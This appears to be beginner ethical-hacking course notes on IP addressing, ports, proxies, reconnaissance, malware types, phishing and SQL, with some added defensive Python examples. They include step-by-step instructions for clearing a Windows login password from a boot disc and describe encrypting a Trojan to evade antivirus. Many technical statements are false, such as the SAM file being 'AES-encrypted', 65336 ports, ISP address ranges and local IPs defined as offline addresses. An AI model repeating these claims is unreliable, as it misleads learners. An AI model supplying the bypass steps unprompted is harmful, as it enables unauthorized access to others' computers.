
IP Address

IP address: An Internet Protocol address (IP address) is a numerical label assigned
to each device (e.g., computer, printer) participating in a computer network that uses
the Internet Protocol for communication. An IP address serves two principal functions:
host or network interface identification and location addressing. Its role has been
characterized as follows: "A name indicates what we seek. An address indicates where it
is. A route indicates how to get there." It is like a phone number for your device.

IP addresses are of two types:

1. Local IP or Static IP: The IP address of the computer when the computer is
not connected to the internet. It remains static, i.e. it does not change.

Local IPs are of two types:

LAN: A local area network (LAN) is a computer network that interconnects
computers within a limited area such as a residence, school, laboratory, or office
building.
MAN: A metropolitan area network (MAN) is a computer network, larger than a
local area network, covering an area of a few city blocks to the area of an entire
city, possibly also including the surrounding areas.

Examples of local IP addresses are:

192.168.1.1
192.168.0.1
172.16.0.1
10.0.0.1

2. Global IP or Public IP: The IP address provided by DHCP to the host when it
gets connected to the internet. A global IP is not a static IP, i.e. it changes every time
you connect to the internet.

(source: www.wikipedia.com)

Examples of Global IP addresses are:

Airtel: 122.0.0.1-122.255.255.254

BSNL: 57.0.0.1-57.255.255.254

Vodafone: 1.0.0.1-1.255.255.254

Tata: 14.0.0.1-14.255.255.254

Reliance: 112.0.0.0-112.255.255.255

IP VERSIONS:
There are two versions of IP:
IPv4: In IPv4 an address consists of 32 bits, which limits the address
space to 4294967296 (2^32) possible unique addresses. IPv4 reserves some addresses for
special purposes such as private networks (18 million addresses) or multicast
addresses (270 million addresses).
IPv4 addresses are canonically represented in dot-decimal notation, which consists of
four decimal numbers, each ranging from 0 to 255, separated by dots, e.g.,
172.16.254.1. Each part represents a group of 8 bits of the address. In some cases of
technical writing, IPv4 addresses may be presented in various hexadecimal, octal,
or binary representations.
IPv6: This new generation of the Internet Protocol was eventually named Internet
Protocol version 6 (IPv6) in 1995. The address size was increased from 32 to
128 bits (16 octets), thus providing up to 2^128 addresses. This is deemed sufficient for the
foreseeable future.

(source:-www.wikipedia.com)

DIFFERENCE BETWEEN IPV4 AND IPV6:

IP SUBNETTING:
A subnetwork, or subnet, is a logical, visible subdivision of an IP network. The practice
of dividing a network into two or more networks is called subnetting. Computers that
belong to a subnet are addressed with a common, identical, most-significant bit-group
in their IP address. This results in the logical division of an IP address into two fields, a
network or routing prefix and the rest field or host identifier. The rest field is an
identifier for a specific host or network interface. IP subnetting is of two types, i.e. IPv4
and IPv6.
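As an added example (not code from the original notes), the following Python uses the standard library's ipaddress module to make the preceding sections concrete: it classifies the page's four local-IP examples as private space, prints the 8-bit groups behind dot-decimal notation, splits an address into the network prefix and host identifier that subnetting relies on, divides a /24 into /26 subnets, and reports the 32-bit versus 128-bit size of IPv4 and IPv6. The sample addresses, the /26 prefix and the interface address 192.168.1.37/26 are constructed for the demonstration.

```python
import ipaddress

# Constructed sample addresses: the page's four "local IP" examples plus two public ones.
SAMPLE_ADDRESSES = ["192.168.1.1", "192.168.0.1", "172.16.0.1", "10.0.0.1",
                    "122.0.0.1", "8.8.8.8"]


def classify(addr: str) -> str:
    """'private' for RFC 1918 and other reserved space, 'public' otherwise."""
    return "private" if ipaddress.ip_address(addr).is_private else "public"


def to_binary_octets(addr: str) -> str:
    """Dot-decimal IPv4 -> the four 8-bit groups, e.g. 11000000.10101000.00000001.00000001."""
    return ".".join(format(int(octet), "08b") for octet in addr.split("."))


def split_address(cidr: str) -> dict:
    """Split an interface address such as 192.168.1.37/26 into the two fields the
    subnetting paragraph describes: the network (routing) prefix and the host identifier."""
    iface = ipaddress.ip_interface(cidr)
    net = iface.network
    host_bits = net.max_prefixlen - net.prefixlen
    return {
        "network": str(net.network_address),
        "prefixlen": net.prefixlen,
        "netmask": str(net.netmask),
        "host_bits": host_bits,
        "host_id": int(iface.ip) - int(net.network_address),
        # The network and broadcast addresses are reserved once there are >= 2 host bits.
        "usable_hosts": net.num_addresses - 2 if host_bits >= 2 else net.num_addresses,
    }


def subnets(cidr: str, new_prefix: int) -> list:
    """Divide one network into equal subnets with a longer prefix (the act of subnetting)."""
    return [str(s) for s in ipaddress.ip_network(cidr).subnets(new_prefix=new_prefix)]


def version_info(addr: str) -> dict:
    """Address size per IP version: 32 bits (4 octets) for IPv4, 128 bits (16 octets) for IPv6."""
    ip = ipaddress.ip_address(addr)
    return {"version": ip.version, "bits": ip.max_prefixlen, "octets": len(ip.packed)}


if __name__ == "__main__":
    for a in SAMPLE_ADDRESSES:
        print(f"{a:12} {classify(a):8} {to_binary_octets(a)}")
    print(split_address("192.168.1.37/26"))
    print(subnets("192.168.1.0/24", 26))
    print(version_info("2001:db8::1"))
```

Run it directly to see the table of classifications; the functions can also be imported and applied to any address or prefix.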

DHCP
The Dynamic Host Configuration Protocol (DHCP) provides configuration parameters to
Internet hosts. DHCP consists of two components: a protocol for delivering
host-specific configuration parameters from a DHCP server to a host, and a
mechanism for allocating network addresses to hosts.
Working of DHCP: DHCP assigns the IP address by taking the IP pool table length
and capacity into account in the process. It provides the LAN IP address to the computer that is
connecting to the internet. Every time the computer connects to the internet, DHCP assigns
a different IP address to the computer.
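To show the allocation mechanism the paragraph describes, here is an added Python model (not part of the original notes) of a DHCP address pool: a fixed pool with a known capacity, one lease per client keyed by its MAC address, lease expiry, renewal, and refusal once the pool is exhausted. The network, pool range, MAC addresses and lease time are constructed, and the current time is passed in by the caller so the example runs deterministically offline.

```python
import ipaddress


class DhcpPool:
    """Minimal model of DHCP address allocation: a pool of addresses, one lease per
    client (keyed by MAC), lease expiry, renewal and pool exhaustion.
    This is an illustration, not a DHCP server implementation."""

    def __init__(self, network: str, first_host: int, last_host: int, lease_time: int = 3600):
        base = int(ipaddress.ip_network(network).network_address)
        # Pool = host numbers first_host..last_host inside the network (constructed range).
        self.pool = [str(ipaddress.ip_address(base + n)) for n in range(first_host, last_host + 1)]
        self.lease_time = lease_time
        self.leases = {}  # mac -> (ip, expires_at)

    def _expire(self, now: int) -> None:
        """Drop leases whose time is up; their addresses return to the pool."""
        for mac, (_ip, expires_at) in list(self.leases.items()):
            if expires_at <= now:
                del self.leases[mac]

    def capacity(self) -> int:
        return len(self.pool)

    def free(self, now: int) -> int:
        self._expire(now)
        return self.capacity() - len(self.leases)

    def request(self, mac: str, now: int):
        """Return the address leased to this client, or None if the pool is exhausted."""
        self._expire(now)
        if mac in self.leases:               # renewal: same address, new expiry
            ip, _ = self.leases[mac]
            self.leases[mac] = (ip, now + self.lease_time)
            return ip
        in_use = {ip for ip, _ in self.leases.values()}
        for ip in self.pool:                 # first free address in pool order
            if ip not in in_use:
                self.leases[mac] = (ip, now + self.lease_time)
                return ip
        return None

    def release(self, mac: str) -> None:
        """Client gives its address back before the lease expires."""
        self.leases.pop(mac, None)


if __name__ == "__main__":
    pool = DhcpPool("192.168.1.0/24", 100, 102, lease_time=600)
    print(pool.request("aa:bb:cc:00:00:01", now=0))   # 192.168.1.100
    print(pool.request("aa:bb:cc:00:00:02", now=1))   # 192.168.1.101
    print(pool.free(now=700))                          # 3: both leases have expired
```

The lease table is what makes the "different address each time" behaviour the text mentions possible: once a lease expires, its address is handed to whichever client asks next.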

(source:-www.mywindows.com)

INTRODUCTION TO PORTS

Ports are the doors of your devices. They can be tangible or intangible in nature and are
responsible for the inlet and outlet of data through the system.

THESE ARE OF TWO TYPES:

PHYSICAL PORTS: These are the tangible ports which we can see, touch and feel.
Examples: USB port, HDMI port, VGA port etc.

VIRTUAL PORTS: These are intangible in nature and mostly based on protocols which
carry the data with respect to a particular standard defined by the IEEE.

Examples:

HTTP : 80, 8080
HTTPS: 443
SMTP : 25
VOIP : random
FTP : 21
SFTP : 19, 20
POP3 : 110

The ports above are pre-reserved ports, but there are a total of 65336 virtual ports in our
computer.

DOMAIN NAME SERVER (DNS):

It is the server which maps the logical address to the physical address of the machine.

Source: Wikipedia

Proxy Servers: These are dummy servers which are designed to change
your online identity by presenting a false identity on the internet. These servers basically
use the IP address of another country to break restrictions or to hide the user's
identity. Proxy servers also add a basic, low-level layer of security to your internet surfing.

There are two types of proxy server:

1. Enterprise Level Proxy Servers: These are proxy servers that give their proxy
server to the website with a weak ping capacity.

2. Client Based Proxy Servers: These are the proxy servers which we usually use
to change our identity online and to secure it.

There are two types of client based proxy servers:

1. Web based Proxy Servers: These are proxy servers which change your
identity only in that particular browser window.
For example:

www.kproxy.com
www.freeproxyserver.ca
www.ninjaproxy.com

2. Standalone Application Proxy Servers: When we use application
software to change our IP address, then we can say we are using an application
based proxy server.

For example: Ultrasurf from Ultrasonic

Source: Wikipedia

VPN:-A virtual private network (VPN) extends a private network across a public
network, such as the Internet. It enables users to send and receive data across
shared or public networks as if their computing devices were directly connected to
the private network, and thus are benefiting from the functionality, security and
management policies of the private network. A VPN is created by establishing a
virtual point-to-point connection through the use of dedicated connections, virtual
tunnelling protocols, or traffic encryption.

For Example: -
Cyber Ghost
Hotspot Security Shield
Freegate

Browser Extensions: There are some browser extensions we can also use to hide
our identity.

For Example: -

DOT VPN

Unlimited Free VPN

INTRODUCTION TO WEB TECHNOLOGIES

The World Wide Web is made up of many kinds of programming and software technologies.
There are basically frontend and backend technologies which we use to create websites.

Frontend: Basically, frontends are the presentation layer between the user and the
backend technologies. Linux based frontends are Apache and Tomcat (PHP). Windows
based frontends are IIS (Internet Information Services) (ASP, ASPX).

Backend: Basically, the backend is the data access layer of web technologies. These
technologies actually store the data of users in a database server and connect the sites to the
database. The Linux based backend technology is LAMP (Linux Apache MySQL PHP).
The Windows based backend technology is WAMP (Windows Apache MySQL PHP). XAMPP
(Cross Platform Apache MySQL PHP Perl) is also a multi-platform technology.

INFORMATION GATHERING
Information gathering is a very essential step of an application security test. The
information system designed for an organization must meet the requirements of the
end users of the organization. To obtain what an end user expects from the information
system, the designer must gain complete knowledge of the organization's working. It is
important for the student to know the information gathering techniques so that no
information is overlooked and the nature and functions of an organization are clearly
understood. The main purpose of gathering information is to determine the information
requirements of an organization. Information requirements are often not stated
precisely by management. It is the analyst's responsibility to prepare a precise Systems
Requirements Specification (SRS), which is easily understood by users, as the SRS
document is a vital document before starting a project.

There are two types of Information Gathering:

1. Web Based Information Gathering: It consists of gathering
information about the target/victim websites.

It can be done through some online information gathering portals:

www.whois.domaintools.com
www.whois.com

This type of gathering consists of information like:

Domain Id
Registrant Email
Registrant Id
IP location
Server type etc.

There are two types of servers:

Shared Server: The server which is connected to a large number of websites is
called a Shared Server.

Dedicated Server: The server which is only dedicated/connected to one
website is called a Dedicated Server.

Whether the server is shared or dedicated can be found out through some online
information portals:

www.yougetsignal.com

2. NETWORK BASED INFORMATION GATHERING:

Simple Network Information Gathering: It's a process in which
we try to extract basic information about the network devices.

It consists of information gathering like:

1. Total number of LIVE IP addresses
2. MAC addresses
3. Shared devices and data on the network
4. CCTV IP addresses
5. Shared printers etc.

It can be done through software like SoftPerfect Network Scanner or
Angry IP Scanner.

Intelligent Information Gathering: It is the type of information gathering
which consists of some deep information about the target/victim computer.
This information consists of:

1. Operating system
2. Open, closed and filtered ports
3. Services running on open ports
4. Versions of the services/applications running on open ports

It can be done through Kali Linux with software like nmap or zenmap.

How To Bypass Windows Login Password

Windows stores its password authentication in a file known as SAM (System Account
Manager). That file is highly encrypted with AES (Advanced Encryption Standard), so
we will crack that file with some software.

Requirements:
1. Hiren's BootCD
2. Blank CD or 1 GB pendrive

Steps:

1. First download Hiren's BootCD.
2. Burn that ISO file to a CD, or make the pendrive bootable with Rufus.
3. Then turn on your PC into BIOS mode, usually by pressing F2 (on some computers
it may be different, like F8, F10 or DEL).
4. After going into BIOS mode, change the boot priority.
5. Save the settings and restart your PC.
6. Then insert your CD or plug in your pendrive.
7. Boot into Hiren's BootCD.
8. Select Aero Boot to boot into Aero mode.
9. Then select Hiren's BootCD Tools.
10. Select Password and Registry Changer.
11. Select Active Password Changer.
12. Select the option "Search for SAM Database(s) on all hard disks and logical drives".
13. In the next step press Enter and select your user name from the list.
14. Select "Clear the User's Password" and press Y to save.
15. Restart your PC and remove the Hiren's BootCD.

INTRODUCTION TO MALWARE
Malware refers to malicious programs in the computer used to disrupt
computer operations, access sensitive information, get unauthorised access to the
computer etc. These are of many types:

1. Virus: It is a malware program that replicates itself or turns (specifically, a
folder) into a large number of copies. This code affects the traditional behaviour of
the operating system, and these viruses cannot spread from one computer to
another without human assistance. No virus can execute itself until
someone double-clicks on it.

2. Worms: A computer worm is a standalone malware computer program that
replicates itself in order to spread to other computers. Often, it uses a computer
network to spread itself, relying on security failures on the target computer to
access it. Unlike a computer virus, it does not need to attach itself to an existing
program. Worms almost always cause at least some harm to the network, even if
only by consuming bandwidth, whereas viruses almost always corrupt or modify
files on a targeted computer.

(www.wikipedia.com)

3. Trojans: These are the RATs (Remote Administration Tools). Once your
computer is infected with a Trojan it can be controlled remotely from
anywhere in the world. Hence an attacker can control the entire hardware capacity
and bandwidth of your computer from anywhere in the world.
There are two types of Trojans:
- Direct Trojans: In this type of Trojan, once any computer is infected it
will not send the access to the attacker; hence the attacker has to know the IP
address of the computer which is infected.

For example: Beast Trojan

- Reverse Trojans: In this type the .exe file which is designed to infect the computer
carries the reverse IP address of the attacker; hence as soon as someone clicks on the
.exe file it is forced to make a connection to the attacker's IP address.

For example: Cybergate and Darkcomet.

(www.wikipedia.com)

4. Rootkits: These are add-ons to viruses and other malware code which
give shelter to the code to make it invisible to all kinds of anti-virus, IDS
(Intrusion Detection System) and IPS (Intrusion Prevention System) systems.
These are designed to enable access to a computer or areas of its software that
would not otherwise be allowed (for example, to an unauthorized user) while at
the same time masking its existence or the existence of other software.

5. Botnets: A botnet is a number of Internet-connected computers
communicating with other similar machines in an effort to complete repetitive
tasks and objectives. These are armies of computers, more than 1000 PCs, which
are infected by Trojans and in bulk they can be used by hackers for DDoS
attacks.

(www.pcworld.com)

6. Spyware: Spyware consists of scripts which steal credentials via a web
browser and send the details to the attacker. It can also be used to spy on the victim,
extract secret details and send them back to the attacker.

7. Adware: These are the websites from which people raise huge money
through advertisements. They are designed to generate huge money from Google AdSense
by infecting websites and showing their advertisements on websites and in
software when you install it without reading and selecting the options.

8. Ransomware: It originated in 2008. Once the hacker infects a
computer, instead of stealing or deleting they encrypt the entire hard disk in
just a few seconds and put a password there. The password is almost 4096-bit
encrypted, hence no one on the planet can crack it. They also ask for money via
bitcoins to send the decrypting password within 48 hours, as a countdown.

If the victim doesn't pay after 48 hours, all files will be shredded and then deleted.

(www.pcworld.com)

Evading Antivirus
When we hear the word virus, our mind thinks about antivirus. Antivirus can save us from
low-level viruses which are fully detectable. Even paid or premium antiviruses can't save
us from a FUD (Fully Undetectable) virus. Criminals make a virus FUD in nature by using some
tools. In this demo we can see how easily antiviruses are bypassed.

1. First we created a Trojan, then we tested that virus on a site called
www.virustotal.com.
2. In this picture we can see that out of 54 antiviruses, 50 find it to be a virus.
3. After this we encrypted that virus with a tool.
4. After encrypting that virus we used the same site to test the virus.
5. This time there are only 29 antiviruses that find it to be a virus. So from this demo we can see
how easily antiviruses are bypassable.

Phishing Attack
An attempt to acquire information such as usernames, passwords, and credit card
details by masquerading as a trustworthy entity in an electronic communication.

Spear phishing: Phishing attempts directed at specific individuals or companies
have been termed spear phishing. Attackers may gather personal information about
their target to increase their probability of success. This technique is, by far, the most
successful on the internet today, accounting for 91% of attacks.

Clone phishing: A type of phishing attack whereby a legitimate, and previously
delivered, email containing an attachment or link has had its content and recipient
addresses taken and used to create an almost identical or cloned email. The attachment
or link within the email is replaced with a malicious version and then sent from an email
address spoofed to appear to come from the original sender. It may claim to be a resend
of the original or an updated version of the original. This technique could be used to
pivot (indirectly) from a previously infected machine and gain a foothold on another
machine, by exploiting the social trust associated with the inferred connection due to
both parties receiving the original email.

Whaling: Several recent phishing attacks have been directed specifically at senior
executives and other high-profile targets within businesses, and the term whaling has
been coined for these kinds of attacks. In the case of whaling, the masquerading web
page/email will take a more serious executive-level form. The content will be crafted to
target an upper manager and the person's role in the company. The content of a
whaling attack email is often written as a legal subpoena, customer complaint, or
executive issue. Whaling scam emails are designed to masquerade as a critical business
email, sent from a legitimate business authority. The content is meant to be tailored for
upper management, and usually involves some kind of falsified company-wide concern.
Whaling phishers have also forged official-looking FBI subpoena emails, and claimed
that the manager needs to click a link and install special software to view the subpoena.

Source

SOCIAL ENGINEERING
Social Engineering (SE) is a blend of science, psychology and art. While it is amazing
and complex, it is also very simple. Unlike hacking, social engineering is basically done
through the social skills of a person. In this type of engineering all the information is accessed
with the permission of the user. It can also be defined as "Any act that influences a person
to take an action that may or may not be in their best interest." It consists of many
types:

1. Baiting

Baiting involves dangling something you want to entice you to take an action the criminal
desires. It can be in the form of a music or movie download on a peer-to-peer site, or it can
be a USB flash drive with a company logo labelled “Executive Salary Summary Q1 2013” left
out in the open for you to find. Then, once the device is used or downloaded, the person or
company’s computer is infected with malicious software allowing the criminal to advance
into your system.

2. Phishing

Phishing involves false emails, chats, or websites designed to impersonate real systems with
the goal of capturing sensitive data. A message might come from a bank or other well
known institution with the need to “verify” your login information. It will usually be a self-
made (fake) login page with all the right logos to look legitimate. It could also be a message
claiming you are the “winner” of some prize or lottery with a request to hand over your
bank information.

3. Pretexting

Pretexting is the human equivalent of phishing, where someone acts as an authority figure
or someone you trust to gain access to your login information. It can take the form of fake IT
support needing to do maintenance, or a false investigator performing a company audit.
Someone might impersonate co-workers, the police, tax authorities or other seemingly
legitimate people in order to gain access to your computer and information.

Email Encryption
Internet technology has many flaws, loopholes and bugs. A cyber criminal can easily hack
into your email account by many methods like social engineering, keyloggers etc. You can
save yourself from hackers, even after they have hacked into your account, by using email encryption.
You just have to set a private key that encrypts your whole message. If someone wants to
read your original message, you just have to decrypt that email message with the
private key which you set before you sent that message. Software that we can use
to encrypt our emails:

Chrome Extension: Secure Mail for Gmail (by Streak)

Mozilla Add-on: Encrypted Communication

IDN Homograph Attack

The internationalized domain name (IDN) homograph attack is a way a malicious party
may deceive computer users about what remote system they are communicating with,
by exploiting the fact that many different characters look alike (i.e., they
are homographs, hence the term for the attack). For example, a person who wants to attack a
victim with the website www.powerbank.com, which is already a registered domain, can
register a new domain with the same name but with characters from a different alphabet,
like the Russian or Greek alphabet.
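The check a defender would run on such a name, as an added Python example (not from the original notes): using only the standard library's unicodedata module and idna codec, it flags a domain label that mixes scripts (Latin letters beside a Cyrillic one), shows the punycode form that the resolver actually sees, and reduces look-alike letters to a Latin "skeleton" so the fake and the real www.powerbank.com compare equal. The confusables table is a small constructed subset of the Unicode confusables list, and the spoofed name uses Cyrillic small o (U+043E) in place of the Latin o, as the paragraph describes.

```python
import unicodedata

# Small constructed subset of Unicode "confusable" mappings: Cyrillic and Greek
# letters that render like Latin ones. The full table is much larger.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0445": "x", "\u0443": "y", "\u0456": "i", "\u0458": "j",   # Cyrillic
    "\u03bf": "o", "\u03b1": "a",                                  # Greek omicron, alpha
}


def scripts_in_label(label: str) -> set:
    """Scripts used by the letters of one DNS label, read from the Unicode character
    name ('LATIN SMALL LETTER P' -> 'LATIN', 'CYRILLIC SMALL LETTER O' -> 'CYRILLIC')."""
    scripts = set()
    for ch in label:
        if ch.isalpha():
            scripts.add(unicodedata.name(ch, "UNKNOWN").split()[0])
    return scripts


def to_ascii(domain: str) -> str:
    """IDNA (punycode) form of the domain, which is what DNS resolution works on."""
    return domain.encode("idna").decode("ascii")


def skeleton(domain: str) -> str:
    """Replace look-alike characters by their Latin counterparts so two homograph
    domains compare equal."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in domain.lower())


def check_domain(domain: str, expected: str = None) -> dict:
    """Flag a domain whose labels mix scripts, or that is a homograph of `expected`
    (the legitimate name the user believes they are visiting)."""
    labels = domain.lower().split(".")
    mixed = [lab for lab in labels if len(scripts_in_label(lab)) > 1]
    ascii_form = to_ascii(domain)
    homograph = (expected is not None and domain.lower() != expected.lower()
                 and skeleton(domain) == skeleton(expected))
    return {
        "ascii": ascii_form,
        "is_idn": ascii_form != domain.lower(),
        "mixed_script_labels": mixed,
        "homograph_of_expected": homograph,
        "suspicious": bool(mixed) or homograph,
    }


if __name__ == "__main__":
    real = "www.powerbank.com"
    fake = "www.p\u043ewerbank.com"   # Cyrillic o instead of Latin o
    print(check_domain(real, real))
    print(check_domain(fake, real))
```

A mixed-script label is the strongest single signal: legitimate internationalised names normally keep one script per label, while the homograph in the paragraph needs Latin and Cyrillic letters side by side.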

Source

Fake E-mail and Trace E-mails

Fake E-mail: Fake e-mail or e-mail spoofing means an email sent from someone
pretending to be someone else. Spoofing may take place in a
number of ways. Common to all of them is that the actual sender's name and the origin
of the message are concealed or masked from the recipient. Many, if not most,
instances of email fraud do use at least minimal spoofing, as most frauds are clearly
criminal acts. Criminals typically try to avoid easy traceability.

Source

Trace E-mail: We get thousands of spam or fake emails daily, so it's
difficult to tolerate those emails. If we want to get information about the email sender, we
just have to find the full source or full header of the e-mail. In the source we can find information
about the sender's domain and other details.
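What "reading the full header" looks like in code, as an added example (not from the original notes): this Python uses only the standard library's email package to parse two constructed messages, pull out the From, Return-Path and Reply-To addresses and the Received chain, and report where the claimed sender and the real origin disagree. Both messages, their hosts and addresses (example.com, example.net and the 192.0.2.x / 198.51.100.x / 203.0.113.x documentation ranges) are constructed for the demonstration.

```python
import email
import re
from email.utils import parseaddr

# Constructed sample 1: a spoofed message. From: claims example-bank.com, but the
# envelope sender (Return-Path), Reply-To and the first relay all point elsewhere.
RAW_SPOOFED = """\
Return-Path: <bounce@mail-relay.example.net>
Received: from mx.example.org (mx.example.org [203.0.113.10])
    by inbox.example.com with ESMTP id 3; Mon, 1 Jan 2024 10:00:02 +0000
Received: from relay.example.net (relay.example.net [198.51.100.7])
    by mx.example.org with ESMTP id 2; Mon, 1 Jan 2024 10:00:01 +0000
Received: from [192.0.2.55] (unknown [192.0.2.55])
    by relay.example.net with SMTP id 1; Mon, 1 Jan 2024 10:00:00 +0000
From: "Example Bank Support" <support@example-bank.com>
Reply-To: support-desk@example-mail.net
To: victim@example.com
Subject: Verify your account

Please verify your login details.
"""

# Constructed sample 2: a consistent message where all three sources agree.
RAW_CONSISTENT = """\
Return-Path: <support@example-bank.com>
Received: from mail.example-bank.com (mail.example-bank.com [203.0.113.20])
    by inbox.example.com with ESMTP id 9; Mon, 1 Jan 2024 11:00:00 +0000
From: Example Bank Support <support@example-bank.com>
To: victim@example.com
Subject: Statement available

Your statement is ready.
"""

RECEIVED_RE = re.compile(r"from\s+(\S+)\s+\(([^)]*)\)\s+by\s+(\S+)", re.IGNORECASE)


def domain_of(addr: str) -> str:
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def trace(raw: str) -> dict:
    """Parse the full header and compare where the mail claims to come from (From:)
    with where it actually entered the mail system (Return-Path, Received chain)."""
    msg = email.message_from_string(raw)
    from_addr = parseaddr(msg.get("From", ""))[1]
    return_path = parseaddr(msg.get("Return-Path", ""))[1]
    reply_to = parseaddr(msg.get("Reply-To", ""))[1]

    hops = []
    for value in msg.get_all("Received", []):
        m = RECEIVED_RE.search(" ".join(value.split()))  # unfold continuation lines
        if m:
            hops.append({"from": m.group(1), "from_info": m.group(2), "by": m.group(3)})
    # Each relay prepends its own Received: line, so the LAST one is the first hop.
    origin_host = hops[-1]["from"] if hops else ""

    from_domain = domain_of(from_addr)
    indicators = []
    if return_path and domain_of(return_path) != from_domain:
        indicators.append("return-path-mismatch")
    if reply_to and domain_of(reply_to) != from_domain:
        indicators.append("reply-to-mismatch")
    if origin_host and not origin_host.lower().endswith(from_domain):
        indicators.append("origin-host-mismatch")
    return {
        "from": from_addr, "from_domain": from_domain,
        "return_path_domain": domain_of(return_path),
        "reply_to": reply_to, "hops": hops, "origin_host": origin_host,
        "indicators": indicators,
    }


if __name__ == "__main__":
    for raw in (RAW_SPOOFED, RAW_CONSISTENT):
        result = trace(raw)
        print(result["from"], "->", result["origin_host"], result["indicators"])
```

The origin-host check is a heuristic: mail legitimately sent through a third-party provider also trips it, which is why the three indicators are reported separately rather than collapsed into one verdict.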

Introduction to Vulnerability Assessment and
Penetration Testing (VAPT)

VAPT consists of two halves, i.e. VA (Vulnerability Assessment) and PT (Penetration
Testing).

VA (Vulnerability Assessment): It consists of information gathering about the vulnerable
flaws or the loopholes which may be used by the attackers to gain access by
exploiting those vulnerabilities.

PT (Penetration Testing): PT is concerned with the hacking attempts made to gain
access to the device or system on the network. In this method many attack vectors are
deployed to observe the execution outcome on the device or technology.

SQL Basics
SQL: Structured Query Language is a special-purpose programming language
designed for managing data held in a relational database management system (RDBMS),
or for stream processing in a RDSMS. Source
Some of The Most Important SQL Commands

1. SELECT

The SELECT statement is used to select data from a database.

The result is stored in a result table, called the result-set.

Syntax

SELECT column_name, column_name FROM table_name;

2. DISTINCT

In a table, a column may contain many duplicate values; and sometimes you only want
to list the different (distinct) values.

The DISTINCT keyword can be used to return only distinct (different) values.

Syntax

SELECT DISTINCT column_name, column_name
FROM table_name;

3. WHERE

The WHERE clause is used to extract only those records that fulfill a specified criterion.

Syntax

SELECT column_name,column_name
FROM table_name
WHERE column_name operator value;

4. And & OR

The AND operator displays a record if both the first condition AND the second condition are true.
The OR operator displays a record if either the first condition OR the second condition is true.

AND Syntax

SELECT * FROM Customers
WHERE Country='example'
AND City='example';

OR Syntax

SELECT * FROM Customers
WHERE City='example'
OR City='example';

5. Order By

The ORDER BY keyword is used to sort the result-set by one or more columns.The
ORDER BY keyword sorts the records in ascending order by default. To sort the records
in a descending order, you can use the DESC keyword.

Syntax

SELECT column_name, column_name
FROM table_name
ORDER BY column_name ASC|DESC, column_name ASC|DESC;

6. Insert Into

The INSERT INTO statement is used to insert new records in a table.

Syntax

INSERT INTO table_name (column1,column2,column3,...)
VALUES (value1,value2,value3,...);

7. Update

The UPDATE statement is used to update existing records in a table.


Syntax

UPDATE table_name
SET column1=value1,column2=value2,...
WHERE some_column=some_value;

8. Delete

The DELETE statement is used to delete rows in a table.

Syntax

DELETE FROM table_name
WHERE some_column=some_value;

9. Injection

SQL injection is a technique where malicious users can inject SQL commands into an SQL
statement, via web page input.Injected SQL commands can alter SQL statement and
compromise the security of a web application.

10. Select Top

The SELECT TOP clause is used to specify the number of records to return.

The SELECT TOP clause can be very useful on large tables with thousands of records.
Returning a large number of records can impact on performance.

Syntax

SELECT TOP 2 * FROM Customers;

13. Like

The LIKE operator is used to search for a specified pattern in a column.

Syntax
SELECT column_name(s)
FROM table_name
WHERE column_name LIKE pattern;

14. Wildcards

In SQL, wildcard characters are used with the SQL LIKE operator. SQL wildcards are used
to search for data within a table.

Wildcard                     Description
%                            A substitute for zero or more characters
_                            A substitute for a single character
[charlist]                   Sets and ranges of characters to match
[^charlist] or [!charlist]   Matches only a character NOT specified within the brackets

Syntax

SELECT * FROM Customers


WHERE City LIKE 'ber%';

15. IN

The IN operator allows you to specify multiple values in a WHERE clause.

Syntax

SELECT column_name(s)
FROM table_name
WHERE column_name IN (value1,value2,...);

16. Between

The BETWEEN operator selects values within a range. The values can be numbers, text, or dates.
Syntax

SELECT column_name(s)
FROM table_name
WHERE column_name BETWEEN value1 AND value2;

17.Between

The BETWEEN operator is used to select values within a range.

Syntax

SELECT column_name(s)
FROM table_name
WHERE column_name BETWEEN value1 AND value2;

18. Aliases

SQL aliases are used to give a database table, or a column in a table, a temporary name.
Basically aliases are created to make column names more readable.

Syntax

SELECT column_name AS alias_name
FROM table_name;

19. Union

The UNION operator is used to combine the result-set of two or more SELECT
statements.

Notice that each SELECT statement within the UNION must have the same number of
columns. The columns must also have similar data types. Also, the columns in each
SELECT statement must be in the same order.

Syntax

SELECT column_name(s) FROM table1
UNION
SELECT column_name(s) FROM table2;

20. Select INTO

The SELECT INTO statement selects data from one table and inserts it into a new table.

Syntax

We can copy all columns into the new table:

SELECT *
INTO newtable [IN externaldb]
FROM table1;

21. Insert Into Select

The INSERT INTO SELECT statement selects data from one table and inserts it into an
existing table. Any existing rows in the target table are unaffected.

Syntax

We can copy all columns from one table to another, existing table:

INSERT INTO table2
SELECT * FROM table1;

22. Create DB

The CREATE DATABASE statement is used to create a database.

Syntax

CREATE DATABASE dbname;

23. The CREATE TABLE statement is used to create a table in a database.

Tables are organized into rows and columns; and each table must have a name.
Syntax

CREATE TABLE table_name
(
column_name1 data_type(size),
column_name2 data_type(size),
column_name3 data_type(size),
....
);

24.CHECK

The CHECK constraint is used to limit the value range that can be placed in a column.

If you define a CHECK constraint on a single column it allows only certain values for this
column.

If you define a CHECK constraint on a table it can limit the values in certain columns
based on values in other columns in the row.

25. Index

An index can be created in a table to find data more quickly and efficiently.

The users cannot see the indexes, they are just used to speed up searches/queries.

Syntax

CREATE INDEX index_name
ON table_name (column_name);

26. Drop
The DROP INDEX statement is used to delete an index in a table.

Syntax

DROP INDEX table_name.index_name

27. Alter

The ALTER TABLE statement is used to add, delete, or modify columns in an existing
table.

SQL ALTER TABLE Syntax

ALTER TABLE table_name
ADD column_name datatype;

28. Auto Increment

Auto-increment allows a unique number to be generated when a new record is inserted


into a table.

Syntax
CREATE TABLE Persons
(
ID int NOT NULL AUTO_INCREMENT,
LastName varchar(255) NOT NULL,
FirstName varchar(255),
Address varchar(255),
City varchar(255),
PRIMARY KEY (ID)
);

29. Views

A view is a virtual table.

Syntax

CREATE VIEW view_name AS
SELECT column_name(s)
FROM table_name
WHERE condition;

30. Null Values

If a column in a table is optional, we can insert a new record or update an existing


record without adding a value to this column. This means that the field will be saved
with a NULL value.

Syntax

SELECT LastName,FirstName,Address FROM Persons
WHERE Address IS NULL;

Source
